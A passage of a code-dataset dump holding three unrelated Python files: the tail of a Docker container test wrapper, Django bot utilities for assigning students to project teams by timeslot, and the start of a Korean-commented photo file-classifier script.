\" f\"Error messages: {errors}\"\n )\n\n @classmethod\n def _fix_path_for_macos(cls):\n # NOTE: To avoid docker.credentials.errors.InitializationError: docker-credential-osxkeychain\n # not installed or not available in PATH.\n # --> Must add /usr/local/bin/ to PATH on macosx platform\n current_path = os.environ[\"PATH\"]\n if \"/usr/local/bin\" not in current_path:\n os.environ[\"PATH\"] = current_path + \":/usr/local/bin\"\n\n @classmethod\n def run_container(cls, image, volumes, sleep=300):\n client = docker.client.from_env()\n container = client.containers.run(image, \"sleep {}\".format(sleep), stderr=True, detach=True, volumes=volumes)\n return container\n\n @classmethod\n def inspect_container(cls, container_id: str):\n return docker.client.inspect_container(container_id)\n\n @classmethod\n def log_response(cls, response):\n errors = []\n for r in response:\n lines = r.decode().split(\"\\r\\n\")\n for line in lines:\n if line:\n line_dict = json.loads(line)\n log_value = line_dict[\"stream\"] if \"stream\" in line_dict else None\n err_detail = line_dict[\"errorDetail\"] if \"errorDetail\" in line_dict else None\n if err_detail:\n err_message = err_detail[\"message\"]\n errors.append(err_message)\n LOG.error(\"[BUILD] %s\", err_message)\n if log_value and \"ERROR\" in log_value:\n errors.append(log_value)\n if log_value and (log_value != \"\\n\"):\n LOG.info(\"[BUILD] %s\", log_value)\n return errors\n\n\nclass DockerMountMode(Enum):\n READ_WRITE = \"rw\"\n READ_ONLY = \"ro\"\n\n\n@auto_str\nclass DockerMount:\n def __init__(self, host_dir, container_dir, mode=DockerMountMode.READ_WRITE):\n self.host_dir = host_dir\n self.container_dir = container_dir\n self.mode = mode\n\n\nclass DockerDiagnosticStdoutAssertionMode(Enum):\n EXACT_MATCH = \"exact_match\"\n SUBSTRING_MATCH = \"substring_match\"\n\n\nclass DockerDiagnosticPhase(Enum):\n PRE = \"pre\"\n POST = \"post\"\n\n\n@auto_str\nclass DockerDiagnosticCommand:\n def __init__(\n self,\n mode,\n phase,\n command,\n expected_exit_code=0,\n expected_output=None,\n expected_output_fragments=None,\n strip=False,\n ):\n self.phase = phase\n self.mode = mode\n self.command = command\n self.expected_exit_code = expected_exit_code\n self.expected_output = expected_output\n self.expected_output_fragments = expected_output_fragments\n self.strip = strip\n\n @classmethod\n def create_exact_match(cls, phase, command, expected_output, expected_exit_code=0, strip=False):\n return cls(\n DockerDiagnosticStdoutAssertionMode.EXACT_MATCH,\n phase,\n command,\n expected_exit_code=expected_exit_code,\n expected_output=expected_output,\n strip=strip,\n )\n\n @classmethod\n def create_substring_match(cls, phase, command, expected_output_fragments, expected_exit_code=0, strip=False):\n return cls(\n DockerDiagnosticStdoutAssertionMode.SUBSTRING_MATCH,\n phase,\n command,\n expected_exit_code=expected_exit_code,\n expected_output_fragments=expected_output_fragments,\n strip=strip,\n )\n\n\nclass CreatePathMode(Enum):\n FULL_PATH = \"FULL_PATH\"\n PARENT_PATH = \"PARENT_PATH\"\n\n\nclass DockerTestSetup:\n def __init__(self, image_name, create_image=False, dockerfile_parent_dir_path=None, dockerfile=None, logger=None):\n self.image_name = image_name\n if create_image:\n if dockerfile_parent_dir_path:\n self.create_image(dockerfile_parent_dir_path=dockerfile_parent_dir_path)\n elif dockerfile:\n DockerWrapper.create_image_from_dockerfile(dockerfile, tag=self.image_name)\n\n if logger:\n self.CMD_LOG = logger\n else:\n self.CMD_LOG = LOG\n\n # Assigned later\n 
self._reinit()\n\n def _reinit(self):\n self.pre_diagnostics: List[DockerDiagnosticCommand] = []\n self.post_diagnostics: List[DockerDiagnosticCommand] = []\n self.test_instance = None\n self.mounts: List[DockerMount] = []\n self.container = None\n\n def cleanup(self):\n self._reinit()\n\n def create_image(self, dockerfile_parent_dir_path=None):\n if not dockerfile_parent_dir_path:\n dockerfile_parent_dir_path = os.getcwd()\n LOG.warning(\n f\"Dockerfile location was not specified. \"\n f\"Trying to create image from current working directory: {dockerfile_parent_dir_path}\"\n )\n DockerWrapper.create_image_from_dir(dockerfile_parent_dir_path, tag=self.image_name)\n\n def mount_dir(self, host_dir, container_dir, mode=DockerMountMode.READ_WRITE):\n self.mounts.append(DockerMount(host_dir, container_dir, mode=mode))\n\n def apply_mounts(self, docker_mounts: List[DockerMount]):\n self.mounts.extend(docker_mounts)\n\n def print_mounts(self):\n LOG.info(\"Docker mounts: %s\", self.mounts)\n\n def add_diagnostics(self, diags: List[DockerDiagnosticCommand]):\n for diag in diags:\n if diag.phase == DockerDiagnosticPhase.PRE:\n self.pre_diagnostics.append(diag)\n elif diag.phase == DockerDiagnosticPhase.POST:\n self.post_diagnostics.append(diag)\n\n def run_container(self, commands_to_run: List[str] = None, sleep=300):\n if not commands_to_run:\n commands_to_run = []\n\n volumes_dict = self._create_volumes_dict()\n LOG.info(f\"Starting container from image '{self.image_name}' with volumes: '{volumes_dict}'\")\n self.container = DockerWrapper.run_container(image=self.image_name, volumes=volumes_dict, sleep=sleep)\n\n if self.pre_diagnostics:\n self._run_pre_diagnostic_commands()\n\n for cmd in commands_to_run:\n self.exec_cmd_in_container(cmd)\n\n if self.post_diagnostics:\n self._run_post_diagnostic_commands()\n return self.container\n\n def _create_volumes_dict(self):\n # Convert DockerMount objects to volumes dictionary\n volumes_dict = {}\n for mount in self.mounts:\n volumes_dict[mount.host_dir] = {\"bind\": mount.container_dir, \"mode\": mount.mode.value}\n return volumes_dict\n\n def _run_pre_diagnostic_commands(self):\n self._run_diagnostic_command(DockerDiagnosticPhase.PRE)\n\n def _run_post_diagnostic_commands(self):\n self._run_diagnostic_command(DockerDiagnosticPhase.POST)\n\n def _run_diagnostic_command(self, phase):\n diag_command_objs: List[DockerDiagnosticCommand] = (\n self.pre_diagnostics if phase == DockerDiagnosticPhase.PRE else self.post_diagnostics\n )\n LOG.debug(\"Running diagnostic commands in '%s' phase: %s\", phase.value, diag_command_objs)\n for diag in diag_command_objs:\n if diag.mode == DockerDiagnosticStdoutAssertionMode.EXACT_MATCH:\n self.exec_diagnostic_command(diag)\n elif diag.mode == DockerDiagnosticStdoutAssertionMode.SUBSTRING_MATCH:\n self.exec_command_and_grep_in_stdout(diag)\n\n def exec_diagnostic_command(self, diag: DockerDiagnosticCommand):\n # TODO Seems like stdout is not returned anymore :(\n exit_code, stdout = self.exec_cmd_in_container(diag.command, strip=diag.strip)\n self.test_instance.assertEqual(\n diag.expected_exit_code,\n exit_code,\n msg=\"Exit code of command is not the expected. \" f\"Command details: {diag}\",\n )\n if diag.strip:\n diag.expected_output = diag.expected_output.strip()\n self.test_instance.assertEqual(\n diag.expected_output, stdout, msg=\"Stdout of command is not the expected. 
\" f\"Command details: {diag}\"\n )\n\n def exec_command_and_grep_in_stdout(self, diag: DockerDiagnosticCommand):\n # TODO Seems like stdout is not returned anymore :(\n exit_code, stdout = self.exec_cmd_in_container(diag.command, strip=diag.strip)\n self.test_instance.assertEqual(\n diag.expected_exit_code,\n exit_code,\n msg=\"Exit code of command is not the expected.\" f\"Command details: {diag}\",\n )\n\n for fragment in diag.expected_output_fragments:\n self.test_instance.assertTrue(\n fragment in stdout,\n msg=\"Cannot find expected fragment in stdout. \"\n f\"Fragment: {fragment}, stdout: {stdout}, Command details: '{diag}'\",\n )\n\n def generate_dummy_text_files_in_container_dirs(self, dir_and_no_of_files: List[Tuple[str, int]]):\n for dir_files in dir_and_no_of_files:\n self._generate_dummy_text_files_in_container_dir(dir_files[0], dir_files[1])\n\n def _generate_dummy_text_files_in_container_dir(self, dir_path: str, number_of_files: int):\n self.exec_cmd_in_container(\"mkdir -p \" + dir_path)\n for i in range(number_of_files):\n path = os.path.normpath(dir_path)\n path_segments = path.split(os.sep)\n path_segments = list(filter(None, path_segments))\n file_name = \"_\".join(path_segments) + \"_\" + str(i + 1)\n file_path = FileUtils.join_path(dir_path, file_name)\n cmd = f\"echo dummy_{str(i + 1)} > {file_path}\"\n # Simple redirect did not work: self._exec_cmd_in_container(cmd)\n # See: https://github.com/docker/docker-py/issues/1637\n # Use this as a workaround\n self.exec_cmd_in_container([\"sh\", \"-c\", cmd])\n\n def exec_cmd_in_container(\n self,\n cmd,\n charset=\"utf-8\",\n strip=True,\n fail_on_error=True,\n stdin=False,\n tty=False,\n env: Dict[str, str] = None,\n detach=False,\n callback=None,\n stream=False,\n strict: bool = True,\n ):\n if not env:\n env = {}\n if strict:\n if not stream and callback:\n raise ValueError(\n \"Callback is specified but streaming mode is not enabled! Callback only makes sense if streaming mode is active!\"\n )\n\n # https://stackoverflow.com/questions/29663459/python-app-does-not-print-anything-when-running-detached-in-docker\n env[\"PYTHONUNBUFFERED\"] = \"1\"\n LOG.info(f\"Running command '{cmd}' in container: '{self.container}'\")\n exec_handler = DockerWrapper.client.exec_create(self.container.id, cmd, environment=env, stdin=stdin, tty=tty)\n ret = DockerWrapper.client.exec_start(exec_handler, stream=stream, detach=detach)\n\n # If stream=True, the execution will stay in _get_output_of_cmd until there's data to read from the output.\n # This means that when the loop that reads the output ends, the process is finished.\n # Therefore, handle stream mode separately.\n if not stream:\n self._get_and_verify_exit_code(callback, charset, cmd, exec_handler, fail_on_error, ret, stream, strip)\n\n if detach:\n exit_code: int = self._get_exit_code(cmd, exec_handler, stream)\n return exit_code, None\n\n decoded_stdout = self._get_output_of_cmd(cmd, ret, callback, charset, strip, stream)\n exit_code = self._get_and_verify_exit_code(\n callback, charset, cmd, exec_handler, fail_on_error, ret, stream, strip\n )\n return exit_code, decoded_stdout\n\n def _get_and_verify_exit_code(self, callback, charset, cmd, exec_handler, fail_on_error, ret, stream, strip):\n exit_code: int = self._get_exit_code(cmd, exec_handler, stream)\n if fail_on_error and exit_code != 0:\n _ = self._get_output_of_cmd(cmd, ret, callback, charset, strip, stream)\n raise ValueError(\n f\"Command '{cmd}' returned with non-zero exit code: {exit_code}. 
See logs above for more details.\"\n            )\n        return exit_code\n\n    def _get_output_of_cmd(self, cmd, ret, callback, charset, strip, stream):\n        LOG.info(f\"Listing stdout of cmd: {cmd}...\")\n        short_cmd = os.path.basename(cmd).rstrip()\n        decoded_stdout = None\n\n        if not stream:\n            if ret:\n                decoded_stdout = ret.decode(charset)\n                if strip:\n                    decoded_stdout = decoded_stdout.strip()\n                self.CMD_LOG.info(f\"[{short_cmd}] {decoded_stdout}\")\n                return decoded_stdout\n            else:\n                LOG.warning(\"Output was None\")\n                return None\n\n        for output in ret:\n            try:\n                decoded_stdout = output.decode(charset)\n                if strip:\n                    decoded_stdout = decoded_stdout.strip()\n                self.CMD_LOG.info(f\"[{short_cmd}] {decoded_stdout}\")\n                if callback:\n                    callback(cmd, decoded_stdout, self)\n            except UnicodeDecodeError:\n                LOG.error(f\"Error while decoding string: {output.decode('cp437')}\")\n        return decoded_stdout\n\n    @staticmethod\n    def _get_exit_code(cmd: str, exec_handler, max_wait_seconds: int = 5):\n        \"\"\"\n        client.exec_inspect(exec_handler[\"Id\"]).get(\"ExitCode\") does not immediately return the exit code.\n        Try to wait for it for some time.\n        :param exec_handler:\n        :return:\n        \"\"\"\n        slept_seconds = 0\n        while True:\n            exit_code: int = DockerWrapper.client.exec_inspect(exec_handler[\"Id\"]).get(\"ExitCode\")\n            LOG.debug(\"Command: '%s', exit code: %s\", cmd, exit_code)\n            if exit_code is not None:\n                return exit_code\n            else:\n                LOG.debug(\"Command: '%s', exit code is still None. Sleeping 1s...\", cmd)\n                time.sleep(1)\n                slept_seconds += 1\n                if slept_seconds == max_wait_seconds:\n                    return None\n\n    def inspect_container(self, container_id: str):\n        return DockerWrapper.inspect_container(container_id)\n\n    def docker_cp_from_container(self, container_path, local_target_path):\n        command = f\"docker cp {self.container.id}:{container_path} {local_target_path}\"\n        LOG.info(\n            \"Copying container directory '%s' to local directory '%s' (container id: %s). Command was: %s\",\n            container_path,\n            local_target_path,\n            self.container.id,\n            command,\n        )\n        SubprocessCommandRunner.run_and_follow_stdout_stderr(command)\n\n    def docker_cp_to_container(\n        self,\n        container_target_path,\n        local_src_file,\n        create_container_path_mode: CreatePathMode = None,\n        double_check_with_ls: bool = False,\n    ):\n        # run mkdir -p if dir not exist\n        self.create_directories_in_container(container_target_path, create_container_path_mode)\n        command = f\"docker cp {local_src_file} {self.container.id}:{container_target_path}\"\n        LOG.info(\n            \"Copying local directory '%s' to container directory '%s' (container id: %s). 
Command was: %s\",\n            local_src_file,\n            container_target_path,\n            self.container.id,\n            command,\n        )\n        SubprocessCommandRunner.run_and_follow_stdout_stderr(command)\n        if double_check_with_ls:\n            self.exec_cmd_in_container(f\"ls -la {container_target_path}\")\n\n    def create_directories_in_container(self, container_target_path: str, create_container_path_mode: CreatePathMode):\n        if not create_container_path_mode:\n            LOG.warning(\"Will not create directories as create_container_path_mode=%s\", create_container_path_mode)\n            return\n        if create_container_path_mode:\n            if create_container_path_mode == CreatePathMode.PARENT_PATH:\n                path_to_create = FileUtils.basename(container_target_path)\n                exit_code, _ = self.exec_cmd_in_container(f\"ls {path_to_create}\", fail_on_error=False)\n            elif create_container_path_mode == CreatePathMode.FULL_PATH:\n                path_to_create = container_target_path\n                exit_code, _ = self.exec_cmd_in_container(f\"ls {path_to_create}\", fail_on_error=False)\n            else:\n                raise ValueError(\"Unknown create path mode: {}\".format(create_container_path_mode))\n\n            if exit_code != 0:\n                self.create_dirs_in_container(path_to_create)\n\n    def create_dirs_in_container(self, path_to_create):\n        LOG.debug(\"Creating directories (recursive) '%s' in container '%s'\", path_to_create, self.container.id)\n        exit_code, _ = self.exec_cmd_in_container(f\"mkdir -p {path_to_create}\")\n        if exit_code != 0:\n            raise ValueError(\n                \"Failed to create directories '{}' in container {}\".format(path_to_create, self.container.id)\n            )\n\n\nclass DockerFileReplacer:\n    vars_to_replace = {}\n\n    # https://stackoverflow.com/a/30777398/1106893\n    @classmethod\n    def replace_all_vars(cls, input, vars_to_replace, default=None, skip_escaped=False):\n        \"\"\"Expand environment variables of form $var and ${var}.\n        If parameter 'skip_escaped' is True, all escaped variable references\n        (i.e. preceded by backslashes) are skipped.\n        Unknown variables are set to 'default'. If 'default' is None,\n        they are left unchanged.\n        \"\"\"\n        cls.vars_to_replace = vars_to_replace\n\n        def replace_var(m):\n            # m.group(0) -> '${VAR}'\n            # m.group(1) -> '{VAR}'\n            # m.group(2) -> 'VAR'\n            varname = m.group(2) or m.group(1)\n            replaced_name = (\n                DockerFileReplacer.vars_to_replace[varname] if varname in DockerFileReplacer.vars_to_replace else None\n            )\n            if not replaced_name:\n                if default:\n                    replaced_name = default\n                else:\n                    replaced_name = m.group(0)\n\n            return replaced_name\n\n        pattern = (r\"(?<!\\\\)\" if skip_escaped else \"\") + r\"\\$(\\w+|\\{([^}]*)\\})\"\n        result = re.sub(pattern, replace_var, input)\n        # TODO -> Unresolved variables (LOG warning)\n        # e.g. 
${PYTHONPATH}\n return result\n\n @classmethod\n def add_env_var_declaration(cls, dockerfile_contents, var_name):\n lines = dockerfile_contents.split(\"\\n\")\n mod_lines = []\n for line in lines:\n if line.startswith(\"FROM\"):\n mod_lines.append(line)\n mod_lines.append(\"ARG {var}\".format(var=var_name))\n mod_lines.append('RUN echo \"{var} = ${var}\"'.format(var=var_name))\n else:\n mod_lines.append(line)\n\n return \"\\n\".join(mod_lines)\n\n\nclass DockerCompose:\n COMPOSE_FILE_TEMPLATE = \"docker-compose{profile}.yml\"\n\n @staticmethod\n def up(working_dir, profile=\"\", wait=0):\n if profile:\n profile = \"-\" + profile\n compose_file = DockerCompose.COMPOSE_FILE_TEMPLATE.format(profile=profile)\n command = \"docker-compose -f {cfile} up -d\".format(cfile=compose_file)\n SubprocessCommandRunner.run(\n command,\n working_dir=working_dir,\n log_command_result=True,\n fail_on_error=True,\n wait_after=10,\n wait_message=\"for docker compose command\",\n )\n\n @staticmethod\n def logs(working_dir):\n command = \"docker-compose logs\"\n SubprocessCommandRunner.run(command, working_dir=working_dir, log_stdout=True)\n","repo_name":"szilard-nemeth/python-commons","sub_path":"pythoncommons/docker_wrapper.py","file_name":"docker_wrapper.py","file_ext":"py","file_size_in_byte":22050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22605049820","text":"from datetime import date, datetime, timedelta\nimport logging\nfrom datetime import datetime, timedelta\nfrom itertools import groupby\nfrom random import choice\nfrom typing import List\n\nfrom bot.management.commands.notificator import notify_everybody, notify_free_students\nfrom bot.models import ProductManager, Project, Student, TeamProject, TimeSlot, PriorityStudents\n\nMAX_TEAM_MEMBERS = 3\nCALL_TIME_MINUTES = 30\nSTUDENTS_LEVELS = (\n Student.BEGINNER,\n Student.BEGINNER_PLUS,\n Student.JUNIOR,\n)\nPROJECTS_START_DATE = \"2022-01-24\"\nPROJECTS_END_DATE = \"2022-02-05\"\n\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\",\n)\nlogger = logging.getLogger(__name__)\n\n\ndef find_priority_student(student: Student) -> List[Student]:\n my_pairs = []\n pairs_1 = PriorityStudents.objects.filter(student_1=student).all()\n my_pairs += [pair.student_2 for pair in pairs_1]\n pairs_2 = PriorityStudents.objects.filter(student_2=student).all()\n my_pairs += [pair.student_1 for pair in pairs_2]\n return my_pairs\n\n\ndef choose_slots(slots: List[TimeSlot]) -> List[TimeSlot]:\n max_slot = []\n for slot in slots:\n team_slots = [slot, ]\n student = slot.student\n my_team_slots = slots.copy()\n my_team_slots.remove(slot)\n my_pairs = find_priority_student(student)\n for team_slot in my_team_slots:\n if team_slot.student in my_pairs:\n team_slots.append(team_slot)\n if len(team_slots) == MAX_TEAM_MEMBERS:\n return team_slots\n if len(team_slots) > len(max_slot):\n max_slot = team_slots.copy()\n my_team_slots = slots.copy()\n for slot in max_slot:\n my_team_slots.remove(slot)\n for i in range(MAX_TEAM_MEMBERS - len(max_slot)):\n logger.info(i)\n new_choice = choice(my_team_slots)\n max_slot.append(new_choice)\n my_team_slots.remove(new_choice)\n return max_slot\n\n\ndef make_teams():\n \"\"\"Распределение учеников по командам и менеджерам.\"\"\"\n if not Student.objects.exists():\n return \"Нет учеников, сначала необходимо зарегистрировать учеников.\"\n if not ProductManager.objects.exists():\n return \"Нет менеджеров, сначала 
необходимо зарегистрировать менеджеров.\"\n\n students_count = Student.objects.count()\n pm_count = ProductManager.objects.count()\n max_teams_of_manager = students_count // MAX_TEAM_MEMBERS // pm_count\n\n for pm in ProductManager.objects.all():\n pm_teams_count = 0\n pm_timeslots = TimeSlot.objects.filter(\n product_manager=pm, student__isnull=True, status=TimeSlot.FREE\n )\n\n for pm_timeslot in pm_timeslots:\n if pm_teams_count == max_teams_of_manager:\n break\n\n for level in STUDENTS_LEVELS:\n if pm_teams_count == max_teams_of_manager:\n break\n\n students_timeslots = TimeSlot.objects.filter(\n time_slot=pm_timeslot.time_slot,\n product_manager__isnull=True,\n student__isnull=False,\n student__level=level,\n status=TimeSlot.FREE,\n ) # TODO: add disctinct by student?\n\n if students_timeslots.count() < MAX_TEAM_MEMBERS:\n continue\n\n team_timeslots = choose_slots(list(students_timeslots))\n # team_timeslots = students_timeslots[:3]\n\n typical_project = choice(Project.objects.all())\n team_project = TeamProject.objects.create(\n date_start=datetime.fromisoformat(PROJECTS_START_DATE),\n date_end=datetime.fromisoformat(PROJECTS_END_DATE),\n project=typical_project,\n )\n\n for slot in team_timeslots:\n slot.product_manager = pm\n slot.team_project = team_project\n slot.status = TimeSlot.BUSY\n slot.save()\n for slot in slot.student.timeslots.filter(status=TimeSlot.FREE):\n slot.status = TimeSlot.NON_ACTUAL\n slot.save()\n\n pm_teams_count += 1\n pm_timeslot.status = TimeSlot.NON_ACTUAL\n pm_timeslot.save()\n break\n\n notify_everybody()\n notify_free_students(get_unallocated_students())\n return \"Распределение успешно\"\n\n\ndef cancel_distribution():\n \"\"\"Отмена распределения, только для непрошедщих проектов.\"\"\"\n\n busy_timeslots = TimeSlot.objects.filter(\n status=TimeSlot.BUSY,\n team_project__date_end__gte=datetime.now(),\n )\n if not busy_timeslots.exists():\n return \"Не найдено временных слотов!\"\n\n for slot in busy_timeslots:\n slot.product_manager = None\n slot.team_project = None\n slot.status = TimeSlot.FREE\n slot.save()\n\n non_actual_timeslots = TimeSlot.objects.filter(\n status=TimeSlot.NON_ACTUAL,\n )\n\n for slot in non_actual_timeslots:\n slot.status = TimeSlot.FREE\n slot.save()\n\n return \"Отмена распределения выполнена успешно\"\n\n\ndef get_unallocated_students():\n \"\"\"Выборка нераспределенных по ПМам и груп��ам учеников,\n т.е. 
тех, у которых все таймслоты имеют статус 'FREE'.\"\"\"\n\n students = Student.objects.all()\n unallocated_students = []\n for student in students:\n timeslot_status_dict = student.timeslots.all().values(\"status\")\n if all(item[\"status\"] == TimeSlot.FREE for item in timeslot_status_dict):\n unallocated_students.append(student)\n\n return unallocated_students\n\n\ndef _timestamps_by_range(time_start, time_end):\n time_delta = timedelta(minutes=CALL_TIME_MINUTES)\n timestamps = []\n\n while time_start <= time_end:\n timestamps.append(time_start.time())\n time_start += time_delta\n\n return timestamps\n\n\ndef _create_timeslot(time_slot=None, student=None, pm=None, team_project=None):\n \"\"\"Создает записи таймслота для заданого времени.\"\"\"\n\n return TimeSlot.objects.get_or_create(\n time_slot=time_slot,\n student=student,\n product_manager=pm,\n team_project=team_project,\n )\n\n\ndef make_timeslots(time_start, time_end, tg_id, project=None):\n \"\"\"Создание таймслотов для ученика или менеджера.\"\"\"\n\n try:\n pm = ProductManager.objects.get(tg_id=tg_id)\n except ProductManager.DoesNotExist:\n pm = None\n\n try:\n student = Student.objects.get(tg_id=tg_id)\n except Student.DoesNotExist:\n student = None\n\n time_stamps = _timestamps_by_range(time_start, time_end)\n\n for time_stamp in time_stamps:\n _create_timeslot(\n time_slot=time_stamp, pm=pm, student=student, team_project=project\n )\n\n\ndef get_teams():\n \"\"\"Возвращает список словарей команд\n сгруппированных по менеджеру и времени созвона.\"\"\"\n\n busy_timeslots = TimeSlot.objects.filter(status=TimeSlot.BUSY).values(\n \"id\", \"time_slot\", \"product_manager__id\", \"student__id\"\n )\n sort_func = lambda timeslot: (\n timeslot[\"product_manager__id\"],\n timeslot[\"time_slot\"],\n )\n\n busy_timeslots_sorted = sorted(busy_timeslots, key=sort_func)\n teams = groupby(busy_timeslots_sorted, key=sort_func)\n teams_list = []\n\n for keys, timeslot_values in teams:\n pm_id, time = keys\n teams_list.append(\n {\n \"pm_id\": pm_id,\n \"time\": time,\n \"time_slot_vals\": list(timeslot_values),\n }\n )\n\n return teams_list\n\n\ndef shift_pm_teams(tg_id, minutes_shift, projects_start_after=datetime.now()):\n \"\"\"Сдвиг всех таймслотов ПМа со статусом BUSY всперед на minutes_shift.\n projects_start_after - дата старше которой выбираются проекты команды.\"\"\"\n if minutes_shift > 60:\n raise AssertionError(\"Сдвиг не должен превышать 60 минут!\")\n\n time_delta = timedelta(minutes=minutes_shift)\n\n pm = ProductManager.objects.get(tg_id=tg_id)\n pm_timeslots = TimeSlot.objects.filter(\n product_manager=pm,\n status=TimeSlot.BUSY,\n team_project__date_start__gte=projects_start_after,\n )\n\n for timeslot in pm_timeslots:\n dt = (\n datetime.combine(\n date.today(),\n timeslot.time_slot,\n )\n + time_delta\n )\n timeslot.time_slot = dt.time()\n timeslot.save()\n","repo_name":"tarodo/ProjectsAutomation","sub_path":"bot/utils/timeslots_utils.py","file_name":"timeslots_utils.py","file_ext":"py","file_size_in_byte":9099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21787954344","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nimport re\r\nimport sys\r\nimport time\r\nfrom collections import OrderedDict\r\nfrom FileClassifier import *\r\nimport FileMoverToRoot as fmrModule\r\n\r\n#처음 작업 위치는 C드라이브 밑으로 변경한다.\r\npath_dir = 'C:/'\r\n#C드라이브 밑에 모든 파일 및 폴더명을 리스트로 가진다.\r\nfileName_list = os.listdir(path_dir)\r\nfileName = \"\"\r\nclassifier_obj = None\r\nsecond_sort_dict = 
{}\r\n\r\n#폴더생성 함수\r\ndef createfolder(directory):\r\n os.chdir('C:/')\r\n try:\r\n if not os.path.exists(directory):\r\n os.makedirs(directory)\r\n except OSError:\r\n print(\"Error: Creating Directory\" + directory)\r\n\r\n#시작 함수\r\ndef start():\r\n while True:\r\n isValidFN = False\r\n while not isValidFN:\r\n print(\"작업 폴더명을 입력하여 주십시오 : \",end='')\r\n fileName = sys.stdin.readline().rstrip()\r\n Enter = \"\"\r\n Space = r\"\\s+\"\r\n Space_check = re.compile(r\"\\s+\")\r\n if Space_check.search(fileName):\r\n print(\"파일명에 공백이 존재하면 안됩니다\")\r\n else:\r\n isValidFN = True\r\n # fileName = input(\"작업 폴더명을 지정해주세요 : \")\r\n # print(fileName)\r\n # Enter = \"\"\r\n # Space = r\"\\s+\"\r\n # Space_check = re.compile(Space)\r\n # 역슬래쉬 부분에 대한 고찰이 필요하다... 해결\r\n #if fileName not in fileName_list and len(fileName) <= 50 and all([c not in \"\\/:.?<>|\" for c in fileName]):\r\n\r\n if fileName not in fileName_list and len(fileName) <= 50 \\\r\n and fileName is not Enter and all([c not in r\"\\/:.?\\\"<>|*\" for c in fileName]):\r\n createfolder(fileName)\r\n print(\"작업 폴더가 \" + fileName + \" 이라는 이름으로 생성되었습니다.\")\r\n return fileName\r\n\r\n #파일명 중복의 경우\r\n elif fileName in fileName_list:\r\n print(\"파일명이 중복되었습니다. 다시 지정해주세요.\\n\")\r\n\r\n #파일명이 0이거나 50이상인 경우\r\n #elif len(fileName) > 50 or len(fileName) == 0:\r\n #공백에 대한 예외처리 필요...미해결\r\n elif len(fileName) > 50 or fileName is Enter or Space_check.match(fileName):\r\n print(\"파일명 지정은 50자이내 입니다.(파일명 미지정도 불가합니다.) 다시 설정해주세요.\\n\")\r\n\r\n #파일명에 붙일 수 없는 특수문자를 붙인 경우\r\n elif [c in r\"\\/:.?<>\\\"|*\" for c in fileName]:\r\n print('''{/ , \\ , : , . , | , < , > , ?, *,\"} 는 파일명에 포함될 수 없습니다. 다시 지정해주세요.\\n''')\r\n\r\n#분류 작업 선택 전 사진 파일이 작업 폴더에 존재하는지 확인\r\ndef photochecker(fileName):\r\n print(\"사진파일을 작업 폴더에 넣어주세요.\\n\")\r\n\r\n myPath = 'C:/' + fileName\r\n file_list = os.listdir(myPath)\r\n '''\r\n file_list_photo = [file for file in file_list if file.endswith(\".bmp\") or file.endswith(\".jpg\") or\r\n file.endswith(\".png\") or file.endswith(\".gif\")]\r\n '''\r\n file_list_photo = [file for file in file_list if file.endswith(\".bmp\") or\r\n file.endswith(\".jpeg\") or file.endswith(\".jpg\") or file.endswith(\".png\") or file.endswith(\".gif\")]\r\n\r\n # while file_list_photo is not None:\r\n ### 수정 시작\r\n oklist = ['OK', 'ok', 'Ok', 'oK']\r\n while not file_list_photo:\r\n print(\"사진파일 또는 사진 폴더가 작업 폴더에 존재하지 않습니다. 사진 파일 또는 사진 폴더를 넣어주세요.\")\r\n\r\n # 중간 멈춤 이후 사진 파일이 작업 폴더에 들어오고 ok sign입력시 다음으로 넘어간다. - 미해결\r\n isok = False\r\n print('사진 파일을 넣었으면 ok를 입력하여 주십시오')\r\n while not isok:\r\n if input() in oklist:\r\n isok = True\r\n\r\n else:\r\n print(\"['OK', 'ok', 'Ok', 'oK'] 중 하나의 올바른 입력을 해주세요.\\n\")\r\n file_list = os.listdir(myPath)\r\n file_list_photo = [file for file in file_list if file.endswith(\".bmp\") or\r\n file.endswith(\".jpeg\") or file.endswith(\".jpg\") or\r\n file.endswith(\".png\") or file.endswith(\".gif\")]\r\n print(\"사진 파일이 확인되었습니다.\\n\")\r\n time.sleep(2)\r\n ## 수정끝\r\n\r\n\r\n\r\n\r\n#ok 입력을 두 번 받게 되어 없애기로 하였다.\r\n'''\r\n#사진 파일이 작업 폴더에 존재하는 것을 확인하고 'ok'입력을 받는다.\r\ndef okcheck():\r\n while True:\r\n okChecker = input(\"사진 파일이 확인되었습니다. 
'OK'를 입력하세요 : \")\r\n list = ['OK', 'ok', 'Ok', 'oK']\r\n\r\n if okChecker in list:\r\n print(\"확인되었습니다.\\n\")\r\n break\r\n else:\r\n print(\"['OK', 'ok', 'Ok', 'oK'] 중 하나의 올바른 입력을 해주세요.\\n\")\r\n\r\n'''\r\n#사용자 분류기준 입력\r\ndef numchecker():\r\n #e = \"\\s*[1-5]{1}\\s*\"\r\n #e = r\"\\s*[1-5]{1}\\s*\"\r\n #sub = \"(\\s*[1-5]{1}\\s*) + (,\\s*[1-5]{1}\\s*){1,4}\"\r\n #sub = r\"\\s*[1-5]{1}\\s*\" + r\"(,\\s*[1-5]{1}\\s*){1,4}\"\r\n\r\n e = r\"\\s*[1-5]{1}\\s*$\"\r\n sub = r\"\\s*[1-5]{1}\\s*\" + r\"(,\\s*[1-5]{1}\\s*){1,4}$\"\r\n\r\n check1 = re.compile(e)\r\n check2 = re.compile(sub)\r\n\r\n while True:\r\n print(\"*****분류 기준*****\")\r\n print(\"1. 파일 크기\\n2. 파일 이름\\n3. 생성 날짜\\n4. 수정 날짜\\n5. 확장자\\n\")\r\n num = input(\"분류 기준을 입력하세요(ex>1,2,3) : \")\r\n if check1.match(num) or check2.match(num):\r\n number = re.compile(r\"\\s+\")\r\n num = re.sub(number, '', num)\r\n number_array = num.split(',')\r\n number_array = list(map(float, number_array))\r\n #수정 후 추가한 part\r\n number_array = list(map(int, number_array))\r\n\r\n if check_duplicate(number_array) is True:\r\n print(\"OK\")\r\n for value in number_array:\r\n if value is 2:\r\n key_value1 = standard_filename()\r\n second_sort_dict['FILE_NAME'] = key_value1\r\n elif value is 3:\r\n key_value2 = date()\r\n second_sort_dict['CREATED_DATE'] = key_value2\r\n elif value is 4:\r\n key_value3 = date()\r\n second_sort_dict['MODIFIED_DATE'] = key_value3\r\n return number_array, 